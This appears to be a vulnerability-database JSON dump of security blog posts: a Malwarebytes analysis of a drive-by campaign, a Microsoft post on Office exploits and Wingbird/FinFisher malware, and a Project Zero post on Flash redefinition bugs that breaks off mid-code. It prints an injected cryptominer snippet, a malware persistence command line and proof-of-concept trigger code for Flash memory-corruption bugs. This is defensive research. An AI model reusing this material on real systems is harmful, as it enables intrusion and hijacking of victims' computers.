[exploit](<http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php>) and [compromise](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) the integrity of Internet Explorer, or leveraged to bypass ASLR/DEP in the past. This is a strong move in the right direction, as trimming the code base leads to shrinking the attack surface. This helps secure products such as Internet Explorer.\n\nIt is also worth noting that at this point no ITW attacks have been observed against Microsoft Edge, the new web browser that currently ships exclusively with Windows 10. Microsoft Edge also follows the same approach of removing unnecessary features such as ActiveX and Browser Helper Objects, as well as [others](<https://blogs.windows.com/msedgedev/2015/05/06/a-break-from-the-past-part-2-saying-goodbye-to-activex-vbscript-attachevent/>).\n\nIn conclusion, after Jan. 12, 2016, older Internet Explorer users will be exposed to vulnerabilities that may be exploited by malware and targeted by Exploit Kits. The best way to defend against this is to keep your browser up to date by upgrading to Internet Explorer 11 or using Microsoft Edge.\n\n[1] Microsoft Security Bulletins: <https://technet.microsoft.com/en-us/library/security/dn610807.aspx>\n", "modified": "2016-01-12T14:49:00", "published": "2016-01-12T14:49:00", "id": "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "href": "https://www.fireeye.com/blog/threat-research/2016/01/end_of_life_for_ie.html", "type": "fireeye", "title": "End of Life for Internet Explorer 8, 9 and 10", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2018-02-22T16:50:35", "bulletinFamily": "blog", "cvelist": ["CVE-2008-2551", "CVE-2008-25511", "CVE-2015-5119", "CVE-2015-51191", "CVE-2016-0189", "CVE-2016-01891"], "description": "During our web crawls we sometimes come across bizarre findings or patterns we haven't seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.\n\nFor years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/urlquery_results.png> \"\" )\n\nThe campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. Although the browser's address bar shows _gusto-delivery[.]com_, there are several injected layers that expose visitors to unwanted code and malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/site_view1.png> \"\" )\n\nFor instance, we find a reference to a Coinhive clone_:_\n \n \n var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {\n threads: navigator.hardwareConcurrency,\n autoThreads: false,\n throttle: 0.2,\n forceASMJS: false\n });\n miner.start();\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_clone1.png> \"\" )\n\nWe are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at _ppoi[.]org_) only takes a 10 percent commission as opposed to 30 percent for Coinhive.\n \n \n \u4e5f\u5c31\u662f\u8bf4\uff0c\u60a8\u5c06\u83b7\u5f97\u6316\u77ff\u6536\u76ca\u768490%\uff0c\u4e0e\u77ff\u6c60\u4e0d\u540c\uff0c\u8fd9\u4e2a\u6536\u76ca\u662f\u56fa\u5b9a\u7684\uff0c\u4e0d\u8bba\u662f\u5426\u7206\u5757\u60a8\u90fd\u5c06\u83b7\u5f97\u8be5\u7b14\u6536\u76ca\n \u6211\u4eec\u5e0c\u671b\u4fdd\u755910%\u6765\u8865\u507f\u4e0d\u7206\u5757\u7684\u635f\u5931\uff0c\u7ef4\u6301\u670d\u52a1\u5668\u7684\u8fd0\u884c\u7b49\n \n I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this\n rate is fixed, regardless of actual blocks found and the luck involved finding them. \n We keep 10% for us to operate this service and to (hopefully) turn a profit.\n\nFinally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flow.png> \"\" )\n\nOn top of a late addition of the aforementioned VBScript similar to the ones found on other Chinese websites, we notice the inclusion of 3 exploits targeting older vulnerabilities in an ActiveX component, the Flash Player and Internet Explorer.\n\n**CVE-2008-2551**\n\nThis old CVE is a vulnerability with the C6 Messenger ActiveX control. The threat actor reused the same code already published [here](<https://www.exploit-db.com/exploits/5732/>) and simply altered the DownloadUrl to point to their malicious binary. Users (unless their browser settings have been changed) will be presented with a prompt asking them to install this piece of malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2008-25511.png> \"\" )\n\n**CVE-2015-5119**\n\nThis is a Flash Player vulnerability affecting Flash up to version 18.0.0.194, which was again lifted from a proof of concept. Its implementation in this particular drive-by is somewhat unstable though and may cause the browser to crash.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2015-51191.png> \"\" )\n\n**CVE-2016-0189**\n\nFinally a more interesting CVE, the well-known Internet Explorer God Mode, although for some unexplained reason, the code was commented out.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2016-01891.png> \"\" )\n\nThe final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.\n\n### Conclusion\n\nAlthough we see the use of several exploits, we cannot call this an exploit kit\u2014not even an amateur one. Indeed, the domain serving the exploits appears to be static and the URIs are always the same.\n\nRegardless, it does not prevent threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, they may still be able to compromise some legacy systems or machines that have not been patched.\n\n### Indicators of compromise\n\nMalicious redirection\n \n \n vip.rm028[].cn\n by007[.]cn\n\nExploit domain and IP\n \n \n shiquanxian.cn\n 103.85.226.65\n\nCVE-2008-2551\n \n \n 5E3AC16B7F55CA52A7B4872758F19D09BD4994190B9D114D68CAB9F1D9D5B467\n\nCVE-2015-5119\n \n \n D53F3FE4354ACFE7BD12528C20DA513DCEFA98B1D60D939BDE32C0815014137E\n\nPayload\n \n \n 65ABED6C77CC219A090EBEF73D6A526FCCEDAA391FBFDCB4B416D0845B3D0DBC\n\nThe post [Drive-by download campaign targets Chinese websites, experiments with exploits](<https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-02-22T16:00:00", "published": "2018-02-22T16:00:00", "id": "MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA", "href": "https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/", "type": "malwarebytes", "title": "Drive-by download campaign targets Chinese websites, experiments with exploits", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mssecure": [{"lastseen": "2018-01-16T03:40:26", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-1099", "CVE-2017-11292", "CVE-2017-11826", "CVE-2017-8570", "CVE-2017-8750", "CVE-2017-8759"], "description": "The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits andhighlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>), [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>), and [Windows Defender Exploit Guard ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>)protect customers from these exploits.\n\n## Exploit attacks in Fall 2017\n\nThe discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) and [info stealers](<https://blogs.technet.microsoft.com/mmpc/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/>) to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.\n\nThe Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.\n\n### CVE-2017-0199\n\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) is a remote code execution (RCE) vulnerability in Microsoft Office allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore protected view warning message. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the _htafile_ OLE object, was fixed in [April 2017 security updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/42b8fa28-9d09-e711-80d9-000d3a32fc99>).\n\n\n\n_Figure 1. CVE-2017-0199 exploit code_\n\nEver since [FireEye blogged](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking them up from the publicly available exploit generator toolkits. As shown in Figure 2, the creator and _lastModifiedBy_ attributes help identify the use of such toolkits in generating exploit documents.\n\n\n\n_Figure 2. Exploit kit identifier_\n\nA slight variation of this exploit, this time in script moniker, was also released. When activated, this exploit can launch [scriptlets](<https://msdn.microsoft.com/en-us/library/office/aa189871\\(v=office.10\\).aspx>) (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute a remote code, as shown in Figure 3.\n\n\n\n_Figure 3. PPSX activation for script moniker_\n\n### CVE-2017-8570\n\nThe [July 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/f2b16606-4945-e711-80dc-000d3a32fc99>) from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8750>), which was discovered in URL moniker that, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as zero-day, the [public availability](<https://github.com/Ring0Mob/CVE-2017-8570>) of exploit toolkit created a wave of malicious PPSX attachments.\n\n### CVE-2017-8759\n\nIn September 2017, [FireEye discovered](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) another zero-day exploit used in targeted attacks. The [CVE-2017-8759 exploit](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>) takes advantage of a code injection vulnerability in .Net Framework while parsing WSDL definition using SOAP moniker. The vulnerability was fixed in the [September 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>). The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker code in vulnerable machines. This exploit piqued our interest because it delivered one of the most complex and multiple VM-layered malware, FinFisher, whose techniques we discuss in the succeeding section.\n\nThe CVE-2017-8759 exploit soon got ported to PPSX file. Figure 4 below shows an example of the exploit.\n\n\n\n_Figure 4. CVE-2017-8759 exploit_\n\n### CVE-2017-11826\n\nFinally, onSeptember 28,2017, [Qihoo 360](<https://360coresec.blogspot.dk/2017/10/new-office-0day-cve-2017-11826.html>) identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the [October 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/313ae481-3088-e711-80e2-000d3a32fc99>). The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.\n\n\n\n_Figure 5. CVE-2017-11826 exploit_\n\n## Payloads\n\nExcept for the memory, corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.\n\nAs cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:\n\n * Attackers used HLFL as element type in the malicious RTF attachment. This element is not supported in RTF official specification but serves as an effective obfuscation for static detections.\n\n\n\n * Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.\n\n\n\nIn most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.\n\n\n\n_Figure 6. PowerShell payload from the HTA file_\n\nHowever, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.\n\n### WingBird (also known as FinFisher)\n\n[Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group [NEODYMIUM](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) is known to use this malware in their attack campaigns.\n\nThe group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our [previous blog post on CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>). So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a [blog](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>):\n\n * CVE-2015-5119 (Adobe Flash)\n * CVE-2016-4117 (Adobe Flash)\n * CVE-2017-8759 (Microsoft Office)\n * CVE-2017-11292 (Adobe Flash)\n\nThe interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Heres a summary of interesting tidbits, which we will expand in an upcoming detailed report on Wingbird.\n\nThe Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that can probe if it is being run in virtualized or debugged environments. We found at least 12 different checks to evade the malwares execution in these environments. The most effective ones are:\n\n * Sandbox environment checks\n * Checks if the malware is executed under the root folder of a drive\n * Checks if the malware file is readable from an external source and if execution path contains the MD5 of its own contents\n\n\n\n * Fingerprinting check\n * Checks if the machine GUID, Windows product ID, and system Bios are from well-known sources\n * VM detection\n * Checks if the machine hardware IDs are _VmBus_ in case of HyperV, or _VEN_15AD_ in case of VMware, etc.\n * Debugger detection\n * Detects debugger and tries to kill it using undocumented APIs and information classes (specifically _ThreadHideFromDebugger_, _ProcessDebugPort_, _ProcessDebugObjectHandle_)\n\n\n\nThe latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:\n\n * _ [randomName].cab_ -Encrypted configuration file\n * _ setup.cab_ - The last PE code section of the setup module; content still unknown\n * _ d3d9.dll_ -Malware loader used on system with restricted privileges; the module is protected by a VM\n * _ aepic.dll_ (or other name) - Malware loader used on admin privileged systems; executed from (and injected into) a faked service; protected by a VM\n * _ msvcr90.dll_ - Malware loader DLL injected into explorer.exe or winlogon.exe process; protected by a VM\n * _ [randomName].7z_ - Encrypted network plugin, used to spy the victim network communications\n * _ wsecedit.rar_ - Main malware dropped executable, protected by a VM\n\nIn the sample we analyzed, the command was 3, which led the malware to create a global event, _0x0A7F1FFAB12BB2_, and drop malware components under a folder located in [_%ProgramData%_](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#programdata>), or in the _[%APPDATA%](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#appdata>)_ folder. If the malware is running with restricted privileges, the persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.\n\n_HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run_ \n_ Value: \"{Random value taken from config file}\"_ \n_ With data: \"C:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE C:\\PROGRAMDATA\\AUDITAPP\\D3D9.DLL, CONTROL_RUN\"_\n\nIf the startup command is 2, the malware copies explorer.exe in the local installation directory, renames _d3d9.dll_ to _uxtheme.dll_, and creates a new _explorer.exe_ process that loads the malware DLL in memory using the DLL sideloading technique.\n\nAll of Wingbirds plugins are stored in its resource section and provide the malware various capabilities, including stealing sensitive information, spying on internet connection, or even diverting SSL connections.\n\nGiven the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.\n\n## Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite\n\nMicrosoft [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attack by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like below in Office 365s Threat Explorer page:\n\n\n\n\n\n_Figure 7. Office 365 ATP detection_\n\nCustomers using [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.\n\n\n\n_Figure 8. Windows Defender ATP alert_\n\nIn addition, enterprises can block malicious documents using [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>), which is part of the defense-in-depth protection in [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>). The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).\n\n\n\n_Figure 9. Windows Defender Exploit Guard detection_\n\nCrimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.\n\nAtMicrosoft, we dont stop working to protect our customers mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.", "modified": "2017-11-21T13:46:01", "published": "2017-11-21T13:46:01", "id": "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/", "type": "mssecure", "title": "Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:16", "bulletinFamily": "info", "cvelist": ["CVE-2013-0765", "CVE-2014-1705", "CVE-2014-8636", "CVE-2015-0305", "CVE-2015-0327", "CVE-2015-0349", "CVE-2015-3039", "CVE-2015-3077", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "description": "Posted by Natalie Silvanovich = function () { return n; }\n\n \n\n\nECMAScript has a property where almost all functions and variables can be dynamically redefined. This can lead to vulnerabilities in situations where native code assumes a function or variable behaves a certain way when accessed or does not have certain side effects when it can in fact be redefined. Project Zero has discovered 24 vulnerabilities involving ECMAScript redefinition in Adobe Flash in the past few months and similar issues have also been discovered in the wild. This post describes how this class of bugs works, alongside some examples of interesting bugs that have been recently patched.\n\n# ECMAScript Redefinition\n\n \n\n\nBeing a dynamically typed language, ECMAScript allows all functions to be redefined. For example, the JavaScript below redefines the alert method.\n\n \n\n\n<script>\n\nfunction f(mystring){\n\ndocument.write(mystring);\n\n}\n\nalert = f;\n\nalert(\u201chello\u201d);\n\n</script>\n\n \n\n\nIn most browsers, this will cause the function document.write to be called instead of a native alert.\n\n \n\n\nWhile this example is fairly benign, in some situations this behaviour can be problematic and lead to bugs. In particular, if native code in the VM relies on an ECMAScript method having specific behavior, but it has been redefined, it can lead to many issues, especially type confusion, overflows and use-after-frees.\n\n# Past Redefinition Bugs\n\n \n\n\nMany security bugs involving redefinition have been discovered in the past. Some of the earliest bugs were bypasses of same-origin-policy in browsers, where redefining a JavaScript function could allow script from an insecure context to be executed. Issues of this type have been found as recently as [last year](<https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636>).\n\n \n\n\nIn the past couple of years, many memory corruption and use-after-free bugs of this type have been found in browsers, such as [CVE-2013-0765](<https://www.mozilla.org/en-US/security/advisories/mfsa2013-19/>) in Firefox and [CVE-2014-1705](<https://code.google.com/p/chromium/issues/detail?id=351787>) in Chrome.\n\n \n\n\nThe recent HackingTeam leak contained five Adobe Flash vulnerabilities, of which four involved redefinition ([CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472&can=1&q=reporter%3Ame>), CVE-2015-5122, CVE-2015-5123 and [CVE-2015-0349](<http://www.zerodayinitiative.com/advisories/ZDI-15-134/>)). An analysis of CVE-2015-5119 is included below\n\n \n\n\nHow to Redefine an Object\n\n \n\n\nOne of the main challenges in finding and exploiting redefinition vulnerabilities is reachability. Many of these issues exist deep in code, and it is not always obvious how to trigger them. Moreover, not all ECMA-based languages support redefinition to the same degree, and it often varies based on the specific function and method being redefined. That said, ECMAScript supports many methods of gaining access to objects, so it is often possible to reach redefinition using less-used ECMAScript functionality.\n\n# Equality Operator\n\n \n\n\nThe equality operator is the simplest way to redefine an object or function and it works to some extent in most ECMAScript implementations. In ActionScript 2, it works without restriction so long as a field doesn\u2019t have a setter defined (although sometimes the code doesn\u2019t compile and needs to be written directly in bytecode). Even read-only properties in AS2 can be redefined with the equality operator by calling ASSetProps to remove the read-only flag first. In ActionScript 3, only classes that are declared as dynamic can have their methods redefined using equality. In browsers, most methods can be redefined using equality, although one host function cannot be set to another host function directly. For example, in the code at the beginning of this post, alert can be set to document.write, but it needs to wrapped in the function f first. Direct assignment will cause the script to fail to execute.\n\n## CVE-2015-3077\n\n \n\n\n[CVE-2015-3077](<https://code.google.com/p/google-security-research/issues/detail?id=254>) is an example of a vulnerability in Flash that occurs because a function can be redefined using equality. A sample of the code that causes the issue is below. Note that this code has been simplified for clarity, and does not compile. A compiling sample of the code can be found in the Project Zero [bug tracker](<https://code.google.com/p/google-security-research/issues/detail?id=254&q=button>). \n\n \n\n\nvar blur = new flash.filters.BlurFilter(100, 15, 5555);\n\nthis.filters = [blur]; //this is a Button\n\nflash.filters.BlurFilter = flash.filters.ConvolutionFilter;\n\nvar f = this.filters;\n\nvar conv = f[0];\n\nconv.matrix = [0,1,1,1,1,1,1,1,1,1,1,1,1,1];\n\n \n\n\nThis is a simple type confusion issue. When the Button.filters method is set, it creates a native array containing all the filters and stores it. When the Button.filters property is read, it creates ActionScript objects of the type of each filter by calling its ActionScript constructor (with the assumption it hasn\u2019t been redefined) and then setting its native backing object to the one stored in the array. If the constructor for a filter is redefined, it calls the constructor for the wrong filter type, but still sets the same native object. This leads to an AS object of one type being backed by a native object of another type, leading to type confusion.\n\n## CVE-2015-0305\n\n \n\n\n[CVE-2015-0305](<https://code.google.com/p/google-security-research/issues/detail?id=150>) is another example of a type confusion issue that occurs through redefinition via equality. \n\n \n\n\nvar b = flash.net;\n\nb.FileReference = q;\n\nfunction q(){\n\nthis.f = flash.display.BitmapData\n\nvar c = new this.f(1000, 1000, true, 1000)\n\n}\n\nvar file = new FileReferenceList();\n\n\u2026\n\nfile.browse();\n\n \n\n\nIt is fairly similar to the previous case. When FileReferenceList.browse is called, the browser spawns a dialog and the user selects files. Then, for each file, the browse method calls the FileReference constructor and creates an object for each file. In this bug, the constructor is overwritten with a constructor that initializes it as a BitmapData object. When the constructor is called, its type is set to FileReference, even though it is not the type that is returned. This leads to an object with an AS object type and native object type that are inconsistent, and therefore type confusion. The bug is that FileReferenceList.browse assumes the FileReference constructor will return a FileReference, even though this isn\u2019t guaranteed because the method can be redefined.\n\n# Proxy Objects\n\n \n\n\nProxy objects can be used in the place of regular objects. They allow functions that handle every property access and method call to be defined. They can sometimes be used to redefine a property where equality fails. They also have the benefit of being able to execute code every time a property is accessed, which can allow behaviour which isn\u2019t possibly when simply setting a property, such as returning a different value each time a property is accessed. ActionScript 3 and JavaScript support Proxy objects.\n\n## CVE-2015-0327\n\n \n\n\n[CVE-2015-0327](<https://code.google.com/p/google-security-research/issues/detail?id=223&can=1&q=stringify>) is an issue found by Ian Beer that can be triggered by calling the stringify method in AS3 on a Proxy object. \n\n \n\n\nwhile (index != 0) {\n\nownDynPropCount++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nAutoDestructingAtomArray propNames(m_fixedmalloc, ownDynPropCount);\n\n\u2026 \n\nwhile (index != 0) {\n\nAtom name = value->nextName(index);\n\npropNames.m_atoms[propNamesIdx] = name;\n\npropNamesIdx++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nThe code above is from the open-source AVM. It counts the elements in value, and then uses the length to allocate an array. The array is then set by enumerating the items in value. However, if value is a Proxy object, the number of elements in each enumeration is not necessarily consistent, which can lead to an overflow in the allocated buffer.\n\n# Conversion Operators\n\n \n\n\nConversion operators, such as toString, valueOf and toInt can often be called implicitly. For example, when calling a native method such as:\n\n \n\n\nvar b = new BitmapData(x, y, true, 0xff00ff);\n\n \n\n\nThis will usually call valueOf on x and y to convert them to integers if they are not already. Functions that take string input often display similar behavior with toString. This can be an avenue for executing scripts at unexpected times. Conversion operators can be redefined in both AS2 and AS3.\n\n## CVE-2015-3039\n\n \n\n\n[CVE-2015-3039](<https://code.google.com/p/google-security-research/issues/detail?id=244>) is a bug in AS2 where calls to conversion operator allows script to be executed unexpectedly during a native call.\n\n \n\n\nvar filter = new ConvolutionFilter(...);\n\nvar n = {};\n\nn.valueOf = ts;\n\nvar a = [];\n\nfor(var k = 0; k < 1; k++){\n\na[k] = n;\n\n}\n\nfilter.matrix = a;\n\nfunction ts(){\n\nfilter.matrix = a;\n\n}\n\n \n\n\nWhen the native matrix getter is called, it first deletes the existing matrix, then reallocates a new one and then sets its contents to the values in the provided matrix. When it fetches the values from the matrix, it calls valueOf to convert the contents of the array to members of the Number class. However, if the valueOf function also calls the matrix getter, it will delete the matrix array, and reallocate it, even though the previous call isn\u2019t complete, and will write to it after the second call returns. This leads to a use-after-free bug. \n\n \n\n\nCVE-2015-5119\n\n \n\n\n[CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472>) is a bug discovered in the HackingTeam leaks which occurs because calls to a conversion operator can cause a buffer to be freed and reallocated before a write to the original buffer.\n\n \n\n\nvar b = new ByteArray();\n\nb.length = 12;\n\nvar n = new myba(b);\n\nb[0] = n;\n\n \n\n\nIn the myba class definition:\n\n \n\n\nprototype.valueOf = function()\n\n{\n\nb.length = 1000;\n\n}\n\n \n\n\nThis bug is in the AS3 interpreter unlike the AS2 interpreter for the issue above, so valueOf has to be redefined in a class definition as shown. The vulnerable code is part of the open source AVM, and is as follows:\n\n \n\n\nvoid ByteArrayObject::setUintProperty(uint32_t i, Atom value)\n\n{\n\nm_byteArray[i] = uint8_t(AvmCore::integer(value));\n\n}\n\n \n\n\nThe AvmCore::integer method calls the valueOf method defined for the object value, which corresponds to the variable n in the ActionScript above. This can then set the length of the byte array, which can cause it to be reallocated. However, the write occurs on the original buffer, leading to a use-after-free.\n\n# Watches\n\n \n\n\nWatches are another method that can be used to change a property of an object. They are supported generically in AS2 and JavaScript. Watches trigger whenever an object property without a custom setter is set. This can sometimes mean that when a native method sets a property, a watch will trigger, allowing a jump into script, and also the ability to change what the property is set to, as a watcher can return a value which supersedes the value that the caller is trying to set the watched field to.\n\n## CVE-2015-3120\n\n \n\n\n[CVE-2015-3120](<https://code.google.com/p/google-security-research/issues/detail?id=337>) is a type confusion issue that can be reached by setting a watch on a variable.\n\n \n\n\nvar fileRef:FileReferenceList = new FileReferenceList();\n\nfileRef.addListener(listener);\n\nfileRef[\"fileList\"] = \"asdf\";\n\nfileRef.watch(\"fileList\", func);\n\nfileRef.browse(allTypes);\n\n \n\n\nfunction func(){\n\nreturn 7777777;\n\n}\n\n \n\n\nSetting a watch on the variable fileList causes the function func to be triggered when the native browse function creates the fileList object and attempts to set it. The function then returns the value 7777777, which is a Number, replacing the object that is set. This leads to type confusion when the variable is used, assumed to be an ActionScript object and used as a pointer as opposed to a Number.\n\n## CVE-2015-3119\n\n \n\n\n[CVE-2015-3119](<https://code.google.com/p/google-security-research/issues/detail?id=336>) is a bug in AS2 that can be triggered by setting a watch on a variable:\n\n \n\n\nclass mysubclass extends NetConnection {\n\nfunction mysubclass(a){\n\nthis.uri = \"test\";\n\nsuper();\n\nthis.watch(\"uri\", func);\n\nvar n = {toString : func}\n\nvar s = super;\n\ntrace(y);\n\nthis.connect(y);\n\nvar f = ASnative(2101, 411); //setBufferTimeMax\n\nf.call(this, 1000);\n\nfunction func(a, b, 